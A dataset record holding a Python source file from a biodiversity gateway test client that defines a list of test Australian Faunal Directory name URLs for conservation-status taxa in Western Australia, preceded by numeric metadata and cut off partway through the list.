| 0.574217
| 0.005085
| 0
| 0.978766
| 1
| 0
| 0.407438
| 0.004285
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f589cf6d6ba464e0009c3d2f0808580c6eb2cb5
| 31,570
|
py
|
Python
|
client/model/types_conservation_status_taxa.py
|
surroundaustralia/ndesgateway-testclient
|
fe6aa6ed7bc2e3664edde16ce4f82fdf8b3b47f2
|
[
"BSD-3-Clause"
] | 1
|
2022-03-08T02:32:20.000Z
|
2022-03-08T02:32:20.000Z
|
client/model/types_conservation_status_taxa.py
|
surroundaustralia/ndesgateway-testclient
|
fe6aa6ed7bc2e3664edde16ce4f82fdf8b3b47f2
|
[
"BSD-3-Clause"
] | 2
|
2022-03-16T06:40:48.000Z
|
2022-03-17T00:08:05.000Z
|
client/model/types_conservation_status_taxa.py
|
surroundaustralia/ndesgateway-testclient
|
fe6aa6ed7bc2e3664edde16ce4f82fdf8b3b47f2
|
[
"BSD-3-Clause"
] | 1
|
2022-03-09T23:10:39.000Z
|
2022-03-09T23:10:39.000Z
|
# from https://linked.data.gov.au/dataset/bdr/conservation-status-taxa-wa
# in the sop_recipe_abis_model datagraphs
CONSERVATION_STATUS_TAXA = [
"https://test-idafd.biodiversity.org.au/name/afd/70162908",
"https://test-idafd.biodiversity.org.au/name/afd/70162916",
"https://test-idafd.biodiversity.org.au/name/afd/70164586",
"https://test-idafd.biodiversity.org.au/name/afd/70165201",
"https://test-idafd.biodiversity.org.au/name/afd/70165203",
"https://test-idafd.biodiversity.org.au/name/afd/70167551",
"https://test-idafd.biodiversity.org.au/name/afd/70167566",
"https://test-idafd.biodiversity.org.au/name/afd/70167571",
"https://test-idafd.biodiversity.org.au/name/afd/70168226",
"https://test-idafd.biodiversity.org.au/name/afd/70171645",
"https://test-idafd.biodiversity.org.au/name/afd/70174584",
"https://test-idafd.biodiversity.org.au/name/afd/70174588",
"https://test-idafd.biodiversity.org.au/name/afd/70174589",
"https://test-idafd.biodiversity.org.au/name/afd/70174590",
"https://test-idafd.biodiversity.org.au/name/afd/70174591",
"https://test-idafd.biodiversity.org.au/name/afd/70174593",
"https://test-idafd.biodiversity.org.au/name/afd/70174596",
"https://test-idafd.biodiversity.org.au/name/afd/70174597",
"https://test-idafd.biodiversity.org.au/name/afd/70174598",
"https://test-idafd.biodiversity.org.au/name/afd/70174599",
"https://test-idafd.biodiversity.org.au/name/afd/70174601",
"https://test-idafd.biodiversity.org.au/name/afd/70174604",
"https://test-idafd.biodiversity.org.au/name/afd/70174605",
"https://test-idafd.biodiversity.org.au/name/afd/70174608",
"https://test-idafd.biodiversity.org.au/name/afd/70174611",
"https://test-idafd.biodiversity.org.au/name/afd/70174612",
"https://test-idafd.biodiversity.org.au/name/afd/70175999",
"https://test-idafd.biodiversity.org.au/name/afd/70176189",
"https://test-idafd.biodiversity.org.au/name/afd/70176351",
"https://test-idafd.biodiversity.org.au/name/afd/70176993",
"https://test-idafd.biodiversity.org.au/name/afd/70177704",
"https://test-idafd.biodiversity.org.au/name/afd/70177902",
"https://test-idafd.biodiversity.org.au/name/afd/70177903",
"https://test-idafd.biodiversity.org.au/name/afd/70179310",
"https://test-idafd.biodiversity.org.au/name/afd/70179311",
"https://test-idafd.biodiversity.org.au/name/afd/70179312",
"https://test-idafd.biodiversity.org.au/name/afd/70179313",
"https://test-idafd.biodiversity.org.au/name/afd/70179314",
"https://test-idafd.biodiversity.org.au/name/afd/70179315",
"https://test-idafd.biodiversity.org.au/name/afd/70179345",
"https://test-idafd.biodiversity.org.au/name/afd/70180670",
"https://test-idafd.biodiversity.org.au/name/afd/70180673",
"https://test-idafd.biodiversity.org.au/name/afd/70180674",
"https://test-idafd.biodiversity.org.au/name/afd/70180678",
"https://test-idafd.biodiversity.org.au/name/afd/70180682",
"https://test-idafd.biodiversity.org.au/name/afd/70181348",
"https://test-idafd.biodiversity.org.au/name/afd/70181350",
"https://test-idafd.biodiversity.org.au/name/afd/70181355",
"https://test-idafd.biodiversity.org.au/name/afd/70181379",
"https://test-idafd.biodiversity.org.au/name/afd/70181382",
"https://test-idafd.biodiversity.org.au/name/afd/70182008",
"https://test-idafd.biodiversity.org.au/name/afd/70182161",
"https://test-idafd.biodiversity.org.au/name/afd/70182790",
"https://test-idafd.biodiversity.org.au/name/afd/70182791",
"https://test-idafd.biodiversity.org.au/name/afd/70182814",
"https://test-idafd.biodiversity.org.au/name/afd/70183770",
"https://test-idafd.biodiversity.org.au/name/afd/70184890",
"https://test-idafd.biodiversity.org.au/name/afd/70185407",
"https://test-idafd.biodiversity.org.au/name/afd/70188407",
"https://test-idafd.biodiversity.org.au/name/afd/70188409",
"https://test-idafd.biodiversity.org.au/name/afd/70188412",
"https://test-idafd.biodiversity.org.au/name/afd/70188414",
"https://test-idafd.biodiversity.org.au/name/afd/70188418",
"https://test-idafd.biodiversity.org.au/name/afd/70195524",
"https://test-idafd.biodiversity.org.au/name/afd/70195525",
"https://test-idafd.biodiversity.org.au/name/afd/70195863",
"https://test-idafd.biodiversity.org.au/name/afd/70195981",
"https://test-idafd.biodiversity.org.au/name/afd/70195982",
"https://test-idafd.biodiversity.org.au/name/afd/70195984",
"https://test-idafd.biodiversity.org.au/name/afd/70195985",
"https://test-idafd.biodiversity.org.au/name/afd/70195987",
"https://test-idafd.biodiversity.org.au/name/afd/70195988",
"https://test-idafd.biodiversity.org.au/name/afd/70195989",
"https://test-idafd.biodiversity.org.au/name/afd/70195990",
"https://test-idafd.biodiversity.org.au/name/afd/70195991",
"https://test-idafd.biodiversity.org.au/name/afd/70195992",
"https://test-idafd.biodiversity.org.au/name/afd/70197086",
"https://test-idafd.biodiversity.org.au/name/afd/70197169",
"https://test-idafd.biodiversity.org.au/name/afd/70197172",
"https://test-idafd.biodiversity.org.au/name/afd/70197262",
"https://test-idafd.biodiversity.org.au/name/afd/70198528",
"https://test-idafd.biodiversity.org.au/name/afd/70199327",
"https://test-idafd.biodiversity.org.au/name/afd/70199426",
"https://test-idafd.biodiversity.org.au/name/afd/70199430",
"https://test-idafd.biodiversity.org.au/name/afd/70199663",
"https://test-idafd.biodiversity.org.au/name/afd/70199746",
"https://test-idafd.biodiversity.org.au/name/afd/70202632",
"https://test-idafd.biodiversity.org.au/name/afd/70202636",
"https://test-idafd.biodiversity.org.au/name/afd/70202637",
"https://test-idafd.biodiversity.org.au/name/afd/70202993",
"https://test-idafd.biodiversity.org.au/name/afd/70202998",
"https://test-idafd.biodiversity.org.au/name/afd/70203007",
"https://test-idafd.biodiversity.org.au/name/afd/70203256",
"https://test-idafd.biodiversity.org.au/name/afd/70204649",
"https://test-idafd.biodiversity.org.au/name/afd/70204650",
"https://test-idafd.biodiversity.org.au/name/afd/70204655",
"https://test-idafd.biodiversity.org.au/name/afd/70204658",
"https://test-idafd.biodiversity.org.au/name/afd/70207034",
"https://test-idafd.biodiversity.org.au/name/afd/70208223",
"https://test-idafd.biodiversity.org.au/name/afd/70208224",
"https://test-idafd.biodiversity.org.au/name/afd/70208227",
"https://test-idafd.biodiversity.org.au/name/afd/70214460",
"https://test-idafd.biodiversity.org.au/name/afd/70214469",
"https://test-idafd.biodiversity.org.au/name/afd/70214498",
"https://test-idafd.biodiversity.org.au/name/afd/70214833",
"https://test-idafd.biodiversity.org.au/name/afd/70215602",
"https://test-idafd.biodiversity.org.au/name/afd/70216090",
"https://test-idafd.biodiversity.org.au/name/afd/70216176",
"https://test-idafd.biodiversity.org.au/name/afd/70216838",
"https://test-idafd.biodiversity.org.au/name/afd/70216839",
"https://test-idafd.biodiversity.org.au/name/afd/70216888",
"https://test-idafd.biodiversity.org.au/name/afd/70217012",
"https://test-idafd.biodiversity.org.au/name/afd/70217319",
"https://test-idafd.biodiversity.org.au/name/afd/70217838",
"https://test-idafd.biodiversity.org.au/name/afd/70220134",
"https://test-idafd.biodiversity.org.au/name/afd/70220995",
"https://test-idafd.biodiversity.org.au/name/afd/70222918",
"https://test-idafd.biodiversity.org.au/name/afd/70222925",
"https://test-idafd.biodiversity.org.au/name/afd/70223068",
"https://test-idafd.biodiversity.org.au/name/afd/70223300",
"https://test-idafd.biodiversity.org.au/name/afd/70224616",
"https://test-idafd.biodiversity.org.au/name/afd/70226370",
"https://test-idafd.biodiversity.org.au/name/afd/70227478",
"https://test-idafd.biodiversity.org.au/name/afd/70227609",
"https://test-idafd.biodiversity.org.au/name/afd/70227610",
"https://test-idafd.biodiversity.org.au/name/afd/70227612",
"https://test-idafd.biodiversity.org.au/name/afd/70227613",
"https://test-idafd.biodiversity.org.au/name/afd/70227615",
"https://test-idafd.biodiversity.org.au/name/afd/70227616",
"https://test-idafd.biodiversity.org.au/name/afd/70227617",
"https://test-idafd.biodiversity.org.au/name/afd/70227618",
"https://test-idafd.biodiversity.org.au/name/afd/70227620",
"https://test-idafd.biodiversity.org.au/name/afd/70227621",
"https://test-idafd.biodiversity.org.au/name/afd/70227622",
"https://test-idafd.biodiversity.org.au/name/afd/70227623",
"https://test-idafd.biodiversity.org.au/name/afd/70227624",
"https://test-idafd.biodiversity.org.au/name/afd/70227625",
"https://test-idafd.biodiversity.org.au/name/afd/70227905",
"https://test-idafd.biodiversity.org.au/name/afd/70228973",
"https://test-idafd.biodiversity.org.au/name/afd/70229034",
"https://test-idafd.biodiversity.org.au/name/afd/70229898",
"https://test-idafd.biodiversity.org.au/name/afd/70229899",
"https://test-idafd.biodiversity.org.au/name/afd/70229924",
"https://test-idafd.biodiversity.org.au/name/afd/70229928",
"https://test-idafd.biodiversity.org.au/name/afd/70230322",
"https://test-idafd.biodiversity.org.au/name/afd/70230324",
"https://test-idafd.biodiversity.org.au/name/afd/70231054",
"https://test-idafd.biodiversity.org.au/name/afd/70231058",
"https://test-idafd.biodiversity.org.au/name/afd/70231088",
"https://test-idafd.biodiversity.org.au/name/afd/70232375",
"https://test-idafd.biodiversity.org.au/name/afd/70232451",
"https://test-idafd.biodiversity.org.au/name/afd/70232583",
"https://test-idafd.biodiversity.org.au/name/afd/70233031",
"https://test-idafd.biodiversity.org.au/name/afd/70234546",
"https://test-idafd.biodiversity.org.au/name/afd/70235188",
"https://test-idafd.biodiversity.org.au/name/afd/70239683",
"https://test-idafd.biodiversity.org.au/name/afd/70241451",
"https://test-idafd.biodiversity.org.au/name/afd/70244527",
"https://test-idafd.biodiversity.org.au/name/afd/70244528",
"https://test-idafd.biodiversity.org.au/name/afd/70246906",
"https://test-idafd.biodiversity.org.au/name/afd/70246921",
"https://test-idafd.biodiversity.org.au/name/afd/70248191",
"https://test-idafd.biodiversity.org.au/name/afd/70248815",
"https://test-idafd.biodiversity.org.au/name/afd/70248846",
"https://test-idafd.biodiversity.org.au/name/afd/70250437",
"https://test-idafd.biodiversity.org.au/name/afd/70251591",
"https://test-idafd.biodiversity.org.au/name/afd/70251592",
"https://test-idafd.biodiversity.org.au/name/afd/70251593",
"https://test-idafd.biodiversity.org.au/name/afd/70251594",
"https://test-idafd.biodiversity.org.au/name/afd/70251595",
"https://test-idafd.biodiversity.org.au/name/afd/70251596",
"https://test-idafd.biodiversity.org.au/name/afd/70251813",
"https://test-idafd.biodiversity.org.au/name/afd/70252582",
"https://test-idafd.biodiversity.org.au/name/afd/70252585",
"https://test-idafd.biodiversity.org.au/name/afd/70252798",
"https://test-idafd.biodiversity.org.au/name/afd/70253122",
"https://test-idafd.biodiversity.org.au/name/afd/70253249",
"https://test-idafd.biodiversity.org.au/name/afd/70254508",
"https://test-idafd.biodiversity.org.au/name/afd/70256724",
"https://test-idafd.biodiversity.org.au/name/afd/70256790",
"https://test-idafd.biodiversity.org.au/name/afd/70256793",
"https://test-idafd.biodiversity.org.au/name/afd/70258140",
"https://test-idafd.biodiversity.org.au/name/afd/70258503",
"https://test-idafd.biodiversity.org.au/name/afd/70260063",
"https://test-idafd.biodiversity.org.au/name/afd/70260064",
"https://test-idafd.biodiversity.org.au/name/afd/70260071",
"https://test-idafd.biodiversity.org.au/name/afd/70261170",
"https://test-idafd.biodiversity.org.au/name/afd/70261287",
"https://test-idafd.biodiversity.org.au/name/afd/70263603",
"https://test-idafd.biodiversity.org.au/name/afd/70263610",
"https://test-idafd.biodiversity.org.au/name/afd/70264561",
"https://test-idafd.biodiversity.org.au/name/afd/70264569",
"https://test-idafd.biodiversity.org.au/name/afd/70264662",
"https://test-idafd.biodiversity.org.au/name/afd/70265111",
"https://test-idafd.biodiversity.org.au/name/afd/70265123",
"https://test-idafd.biodiversity.org.au/name/afd/70265124",
"https://test-idafd.biodiversity.org.au/name/afd/70265184",
"https://test-idafd.biodiversity.org.au/name/afd/70266881",
"https://test-idafd.biodiversity.org.au/name/afd/70268851",
"https://test-idafd.biodiversity.org.au/name/afd/70270743",
"https://test-idafd.biodiversity.org.au/name/afd/70271780",
"https://test-idafd.biodiversity.org.au/name/afd/70271857",
"https://test-idafd.biodiversity.org.au/name/afd/70271859",
"https://test-idafd.biodiversity.org.au/name/afd/70272009",
"https://test-idafd.biodiversity.org.au/name/afd/70273308",
"https://test-idafd.biodiversity.org.au/name/afd/70273330",
"https://test-idafd.biodiversity.org.au/name/afd/70273907",
"https://test-idafd.biodiversity.org.au/name/afd/70274243",
"https://test-idafd.biodiversity.org.au/name/afd/70274706",
"https://test-idafd.biodiversity.org.au/name/afd/70274719",
"https://test-idafd.biodiversity.org.au/name/afd/70277849",
"https://test-idafd.biodiversity.org.au/name/afd/70277851",
"https://test-idafd.biodiversity.org.au/name/afd/70285187",
"https://test-idafd.biodiversity.org.au/name/afd/70285194",
"https://test-idafd.biodiversity.org.au/name/afd/70285198",
"https://test-idafd.biodiversity.org.au/name/afd/70285584",
"https://test-idafd.biodiversity.org.au/name/afd/70285746",
"https://test-idafd.biodiversity.org.au/name/afd/70285750",
"https://test-idafd.biodiversity.org.au/name/afd/70286324",
"https://test-idafd.biodiversity.org.au/name/afd/70287749",
"https://test-idafd.biodiversity.org.au/name/afd/70287751",
"https://test-idafd.biodiversity.org.au/name/afd/70287816",
"https://test-idafd.biodiversity.org.au/name/afd/70287833",
"https://test-idafd.biodiversity.org.au/name/afd/70288732",
"https://test-idafd.biodiversity.org.au/name/afd/70289475",
"https://test-idafd.biodiversity.org.au/name/afd/70289476",
"https://test-idafd.biodiversity.org.au/name/afd/70289479",
"https://test-idafd.biodiversity.org.au/name/afd/70289480",
"https://test-idafd.biodiversity.org.au/name/afd/70289481",
"https://test-idafd.biodiversity.org.au/name/afd/70289486",
"https://test-idafd.biodiversity.org.au/name/afd/70290449",
"https://test-idafd.biodiversity.org.au/name/afd/70290501",
"https://test-idafd.biodiversity.org.au/name/afd/70292085",
"https://test-idafd.biodiversity.org.au/name/afd/70292086",
"https://test-idafd.biodiversity.org.au/name/afd/70292087",
"https://test-idafd.biodiversity.org.au/name/afd/70292088",
"https://test-idafd.biodiversity.org.au/name/afd/70295160",
"https://test-idafd.biodiversity.org.au/name/afd/70295161",
"https://test-idafd.biodiversity.org.au/name/afd/70296349",
"https://test-idafd.biodiversity.org.au/name/afd/70297596",
"https://test-idafd.biodiversity.org.au/name/afd/70297628",
"https://test-idafd.biodiversity.org.au/name/afd/70298163",
"https://test-idafd.biodiversity.org.au/name/afd/70298233",
"https://test-idafd.biodiversity.org.au/name/afd/70298740",
"https://test-idafd.biodiversity.org.au/name/afd/70299515",
"https://test-idafd.biodiversity.org.au/name/afd/70299516",
"https://test-idafd.biodiversity.org.au/name/afd/70299517",
"https://test-idafd.biodiversity.org.au/name/afd/70299518",
"https://test-idafd.biodiversity.org.au/name/afd/70299519",
"https://test-idafd.biodiversity.org.au/name/afd/70299520",
"https://test-idafd.biodiversity.org.au/name/afd/70299521",
"https://test-idafd.biodiversity.org.au/name/afd/70300122",
"https://test-idafd.biodiversity.org.au/name/afd/70300340",
"https://test-idafd.biodiversity.org.au/name/afd/70300451",
"https://test-idafd.biodiversity.org.au/name/afd/70300457",
"https://test-idafd.biodiversity.org.au/name/afd/70300965",
"https://test-idafd.biodiversity.org.au/name/afd/70302014",
"https://test-idafd.biodiversity.org.au/name/afd/70302016",
"https://test-idafd.biodiversity.org.au/name/afd/70302020",
"https://test-idafd.biodiversity.org.au/name/afd/70302022",
"https://test-idafd.biodiversity.org.au/name/afd/70302024",
"https://test-idafd.biodiversity.org.au/name/afd/70302102",
"https://test-idafd.biodiversity.org.au/name/afd/70302288",
"https://test-idafd.biodiversity.org.au/name/afd/70303806",
"https://test-idafd.biodiversity.org.au/name/afd/70303807",
"https://test-idafd.biodiversity.org.au/name/afd/70304409",
"https://test-idafd.biodiversity.org.au/name/afd/70305109",
"https://test-idafd.biodiversity.org.au/name/afd/70305487",
"https://test-idafd.biodiversity.org.au/name/afd/70306547",
"https://test-idafd.biodiversity.org.au/name/afd/70311479",
"https://test-idafd.biodiversity.org.au/name/afd/70311489",
"https://test-idafd.biodiversity.org.au/name/afd/70312855",
"https://test-idafd.biodiversity.org.au/name/afd/70312859",
"https://test-idafd.biodiversity.org.au/name/afd/70312865",
"https://test-idafd.biodiversity.org.au/name/afd/70312866",
"https://test-idafd.biodiversity.org.au/name/afd/70312867",
"https://test-idafd.biodiversity.org.au/name/afd/70312876",
"https://test-idafd.biodiversity.org.au/name/afd/70312878",
"https://test-idafd.biodiversity.org.au/name/afd/70312882",
"https://test-idafd.biodiversity.org.au/name/afd/70313621",
"https://test-idafd.biodiversity.org.au/name/afd/70313626",
"https://test-idafd.biodiversity.org.au/name/afd/70314474",
"https://test-idafd.biodiversity.org.au/name/afd/70315958",
"https://test-idafd.biodiversity.org.au/name/afd/70316947",
"https://test-idafd.biodiversity.org.au/name/afd/70316953",
"https://test-idafd.biodiversity.org.au/name/afd/70317053",
"https://test-idafd.biodiversity.org.au/name/afd/70317056",
"https://test-idafd.biodiversity.org.au/name/afd/70317058",
"https://test-idafd.biodiversity.org.au/name/afd/70317059",
"https://test-idafd.biodiversity.org.au/name/afd/70317254",
"https://test-idafd.biodiversity.org.au/name/afd/70322776",
"https://test-idafd.biodiversity.org.au/name/afd/70322779",
"https://test-idafd.biodiversity.org.au/name/afd/70323779",
"https://test-idafd.biodiversity.org.au/name/afd/70324406",
"https://test-idafd.biodiversity.org.au/name/afd/70324452",
"https://test-idafd.biodiversity.org.au/name/afd/70324453",
"https://test-idafd.biodiversity.org.au/name/afd/70324458",
"https://test-idafd.biodiversity.org.au/name/afd/70325324",
"https://test-idafd.biodiversity.org.au/name/afd/70325733",
"https://test-idafd.biodiversity.org.au/name/afd/70327447",
"https://test-idafd.biodiversity.org.au/name/afd/70329302",
"https://test-idafd.biodiversity.org.au/name/afd/70330861",
"https://test-idafd.biodiversity.org.au/name/afd/70331275",
"https://test-idafd.biodiversity.org.au/name/afd/70333752",
"https://test-idafd.biodiversity.org.au/name/afd/70334439",
"https://test-idafd.biodiversity.org.au/name/afd/70335813",
"https://test-idafd.biodiversity.org.au/name/afd/70335929",
"https://test-idafd.biodiversity.org.au/name/afd/70342130",
"https://test-idafd.biodiversity.org.au/name/afd/70345235",
"https://test-idafd.biodiversity.org.au/name/afd/70345238",
"https://test-idafd.biodiversity.org.au/name/afd/70345433",
"https://test-idafd.biodiversity.org.au/name/afd/70346174",
"https://test-idafd.biodiversity.org.au/name/afd/70346208",
"https://test-idafd.biodiversity.org.au/name/afd/70346234",
"https://test-idafd.biodiversity.org.au/name/afd/70346268",
"https://test-idafd.biodiversity.org.au/name/afd/70346281",
"https://test-idafd.biodiversity.org.au/name/afd/70346329",
"https://test-idafd.biodiversity.org.au/name/afd/70346335",
"https://test-idafd.biodiversity.org.au/name/afd/70347205",
"https://test-idafd.biodiversity.org.au/name/afd/70347698",
"https://test-idafd.biodiversity.org.au/name/afd/70349617",
"https://test-idafd.biodiversity.org.au/name/afd/70349619",
"https://test-idafd.biodiversity.org.au/name/afd/70349808",
"https://test-idafd.biodiversity.org.au/name/afd/70350130",
"https://test-idafd.biodiversity.org.au/name/afd/70350988",
"https://test-idafd.biodiversity.org.au/name/afd/70352881",
"https://test-idafd.biodiversity.org.au/name/afd/70352885",
"https://test-idafd.biodiversity.org.au/name/afd/70352894",
"https://test-idafd.biodiversity.org.au/name/afd/70355354",
"https://test-idafd.biodiversity.org.au/name/afd/70355444",
"https://test-idafd.biodiversity.org.au/name/afd/70356809",
"https://test-idafd.biodiversity.org.au/name/afd/70356810",
"https://test-idafd.biodiversity.org.au/name/afd/70357156",
"https://test-idafd.biodiversity.org.au/name/afd/70360348",
"https://test-idafd.biodiversity.org.au/name/afd/70360885",
"https://test-idafd.biodiversity.org.au/name/afd/70360892",
"https://test-idafd.biodiversity.org.au/name/afd/70361265",
"https://test-idafd.biodiversity.org.au/name/afd/70362757",
"https://test-idafd.biodiversity.org.au/name/afd/70365077",
"https://test-idafd.biodiversity.org.au/name/afd/70366346",
"https://test-idafd.biodiversity.org.au/name/afd/70367067",
"https://test-idafd.biodiversity.org.au/name/afd/70368015",
"https://test-idafd.biodiversity.org.au/name/afd/70368163",
"https://test-idafd.biodiversity.org.au/name/afd/70368935",
"https://test-idafd.biodiversity.org.au/name/afd/70373790",
"https://test-idafd.biodiversity.org.au/name/afd/70376631",
"https://test-idafd.biodiversity.org.au/name/afd/70377818",
"https://test-idafd.biodiversity.org.au/name/afd/70378180",
"https://test-idafd.biodiversity.org.au/name/afd/70378181",
"https://test-idafd.biodiversity.org.au/name/afd/70378420",
"https://test-idafd.biodiversity.org.au/name/afd/70379814",
"https://test-idafd.biodiversity.org.au/name/afd/70380413",
"https://test-idafd.biodiversity.org.au/name/afd/70381780",
"https://test-idafd.biodiversity.org.au/name/afd/70381781",
"https://test-idafd.biodiversity.org.au/name/afd/70381782",
"https://test-idafd.biodiversity.org.au/name/afd/70382107",
"https://test-idafd.biodiversity.org.au/name/afd/70382989",
"https://test-idafd.biodiversity.org.au/name/afd/70383316",
"https://test-idafd.biodiversity.org.au/name/afd/70384107",
"https://test-idafd.biodiversity.org.au/name/afd/70384108",
"https://test-idafd.biodiversity.org.au/name/afd/70384110",
"https://test-idafd.biodiversity.org.au/name/afd/70384115",
"https://test-idafd.biodiversity.org.au/name/afd/70385776",
"https://test-idafd.biodiversity.org.au/name/afd/70386439",
"https://test-idafd.biodiversity.org.au/name/afd/70386757",
"https://test-idafd.biodiversity.org.au/name/afd/70386758",
"https://test-idafd.biodiversity.org.au/name/afd/70387748",
"https://test-idafd.biodiversity.org.au/name/afd/70387753",
"https://test-idafd.biodiversity.org.au/name/afd/70387758",
"https://test-idafd.biodiversity.org.au/name/afd/70387777",
"https://test-idafd.biodiversity.org.au/name/afd/70387785",
"https://test-idafd.biodiversity.org.au/name/afd/70387786",
"https://test-idafd.biodiversity.org.au/name/afd/70387790",
"https://test-idafd.biodiversity.org.au/name/afd/70387796",
"https://test-idafd.biodiversity.org.au/name/afd/70387802",
"https://test-idafd.biodiversity.org.au/name/afd/70387814",
"https://test-idafd.biodiversity.org.au/name/afd/70387825",
"https://test-idafd.biodiversity.org.au/name/afd/70387827",
"https://test-idafd.biodiversity.org.au/name/afd/70387830",
"https://test-idafd.biodiversity.org.au/name/afd/70387831",
"https://test-idafd.biodiversity.org.au/name/afd/70387832",
"https://test-idafd.biodiversity.org.au/name/afd/70387834",
"https://test-idafd.biodiversity.org.au/name/afd/70387849",
"https://test-idafd.biodiversity.org.au/name/afd/70387854",
"https://test-idafd.biodiversity.org.au/name/afd/70388323",
"https://test-idafd.biodiversity.org.au/name/afd/70388364",
"https://test-idafd.biodiversity.org.au/name/afd/70388365",
"https://test-idafd.biodiversity.org.au/name/afd/70389001",
"https://test-idafd.biodiversity.org.au/name/afd/70389257",
"https://test-idafd.biodiversity.org.au/name/afd/70389258",
"https://test-idafd.biodiversity.org.au/name/afd/70389259",
"https://test-idafd.biodiversity.org.au/name/afd/70389524",
"https://test-idafd.biodiversity.org.au/name/afd/70389533",
"https://test-idafd.biodiversity.org.au/name/afd/70393015",
"https://test-idafd.biodiversity.org.au/name/afd/70393185",
"https://test-idafd.biodiversity.org.au/name/afd/70393188",
"https://test-idafd.biodiversity.org.au/name/afd/70393533",
"https://test-idafd.biodiversity.org.au/name/afd/70393537",
"https://test-idafd.biodiversity.org.au/name/afd/70395745",
"https://test-idafd.biodiversity.org.au/name/afd/70397406",
"https://test-idafd.biodiversity.org.au/name/afd/70397409",
"https://test-idafd.biodiversity.org.au/name/afd/70401805",
"https://test-idafd.biodiversity.org.au/name/afd/70404092",
"https://test-idafd.biodiversity.org.au/name/afd/70404580",
"https://test-idafd.biodiversity.org.au/name/afd/70404975",
"https://test-idafd.biodiversity.org.au/name/afd/70404977",
"https://test-idafd.biodiversity.org.au/name/afd/70404979",
"https://test-idafd.biodiversity.org.au/name/afd/70404980",
"https://test-idafd.biodiversity.org.au/name/afd/70404981",
"https://test-idafd.biodiversity.org.au/name/afd/70404982",
"https://test-idafd.biodiversity.org.au/name/afd/70404984",
"https://test-idafd.biodiversity.org.au/name/afd/70404985",
"https://test-idafd.biodiversity.org.au/name/afd/70406086",
"https://test-idafd.biodiversity.org.au/name/afd/70407584",
"https://test-idafd.biodiversity.org.au/name/afd/70408085",
"https://test-idafd.biodiversity.org.au/name/afd/70408100",
"https://test-idafd.biodiversity.org.au/name/afd/70408131",
"https://test-idafd.biodiversity.org.au/name/afd/70408134",
"https://test-idafd.biodiversity.org.au/name/afd/70408595",
"https://test-idafd.biodiversity.org.au/name/afd/70408935",
"https://test-idafd.biodiversity.org.au/name/afd/70408956",
"https://test-idafd.biodiversity.org.au/name/afd/70409735",
"https://test-idafd.biodiversity.org.au/name/afd/70409767",
"https://test-idafd.biodiversity.org.au/name/afd/70411788",
"https://test-idafd.biodiversity.org.au/name/afd/70411799",
"https://test-idafd.biodiversity.org.au/name/afd/70412646",
"https://test-idafd.biodiversity.org.au/name/afd/70413908",
"https://test-idafd.biodiversity.org.au/name/afd/70417610",
"https://test-idafd.biodiversity.org.au/name/afd/70418247",
"https://test-idafd.biodiversity.org.au/name/afd/70418975",
"https://test-idafd.biodiversity.org.au/name/afd/70421266",
"https://test-idafd.biodiversity.org.au/name/afd/70421274",
"https://test-idafd.biodiversity.org.au/name/afd/70422141",
"https://test-idafd.biodiversity.org.au/name/afd/70422144",
"https://test-idafd.biodiversity.org.au/name/afd/70422212",
"https://test-idafd.biodiversity.org.au/name/afd/70422292",
"https://test-idafd.biodiversity.org.au/name/afd/70422369",
"https://test-idafd.biodiversity.org.au/name/afd/70422374",
"https://test-idafd.biodiversity.org.au/name/afd/70422561",
"https://test-idafd.biodiversity.org.au/name/afd/70423636",
"https://test-idafd.biodiversity.org.au/name/afd/70424033",
"https://test-idafd.biodiversity.org.au/name/afd/70424035",
"https://test-idafd.biodiversity.org.au/name/afd/70424571",
"https://test-idafd.biodiversity.org.au/name/afd/70425463",
"https://test-idafd.biodiversity.org.au/name/afd/70427304",
"https://test-idafd.biodiversity.org.au/name/afd/70427979",
"https://test-idafd.biodiversity.org.au/name/afd/70427980",
"https://test-idafd.biodiversity.org.au/name/afd/70428447",
"https://test-idafd.biodiversity.org.au/name/afd/70430090",
"https://test-idafd.biodiversity.org.au/name/afd/70430093",
"https://test-idafd.biodiversity.org.au/name/afd/70430554",
"https://test-idafd.biodiversity.org.au/name/afd/70432923",
"https://test-idafd.biodiversity.org.au/name/afd/70433252",
"https://test-idafd.biodiversity.org.au/name/afd/70433493",
"https://test-idafd.biodiversity.org.au/name/afd/70433509",
"https://test-idafd.biodiversity.org.au/name/afd/70433515",
"https://test-idafd.biodiversity.org.au/name/afd/70433519",
"https://test-idafd.biodiversity.org.au/name/afd/70434370",
"https://test-idafd.biodiversity.org.au/name/afd/70437941",
"https://test-idafd.biodiversity.org.au/name/afd/70438048",
"https://test-idafd.biodiversity.org.au/name/afd/70440034",
"https://test-idafd.biodiversity.org.au/name/afd/70440498",
"https://test-idafd.biodiversity.org.au/name/afd/70444906",
"https://test-idafd.biodiversity.org.au/name/afd/70445431",
"https://test-idafd.biodiversity.org.au/name/afd/70448887",
"https://test-idafd.biodiversity.org.au/name/afd/70449358",
"https://test-idafd.biodiversity.org.au/name/afd/70449359",
"https://test-idafd.biodiversity.org.au/name/afd/70449361",
"https://test-idafd.biodiversity.org.au/name/afd/70449558",
"https://test-idafd.biodiversity.org.au/name/afd/70449562",
"https://test-idafd.biodiversity.org.au/name/afd/70451548",
"https://test-idafd.biodiversity.org.au/name/afd/70451556",
"https://test-idafd.biodiversity.org.au/name/afd/70456220",
"https://test-idafd.biodiversity.org.au/name/afd/70456222",
"https://test-idafd.biodiversity.org.au/name/afd/70456224",
"https://test-idafd.biodiversity.org.au/name/afd/70456226",
"https://test-idafd.biodiversity.org.au/name/afd/70456227",
"https://test-idafd.biodiversity.org.au/name/afd/70456228",
"https://test-idafd.biodiversity.org.au/name/afd/70456237",
"https://test-idafd.biodiversity.org.au/name/afd/70457940",
"https://test-idafd.biodiversity.org.au/name/afd/70463103",
"https://test-idafd.biodiversity.org.au/name/afd/70464994",
"https://test-idafd.biodiversity.org.au/name/afd/70465807",
"https://test-idafd.biodiversity.org.au/name/afd/70465833",
"https://test-idafd.biodiversity.org.au/name/afd/70465843",
"https://test-idafd.biodiversity.org.au/name/afd/70466502",
"https://test-idafd.biodiversity.org.au/name/afd/70467686",
"https://test-idafd.biodiversity.org.au/name/afd/70467687",
"https://test-idafd.biodiversity.org.au/name/afd/70467688",
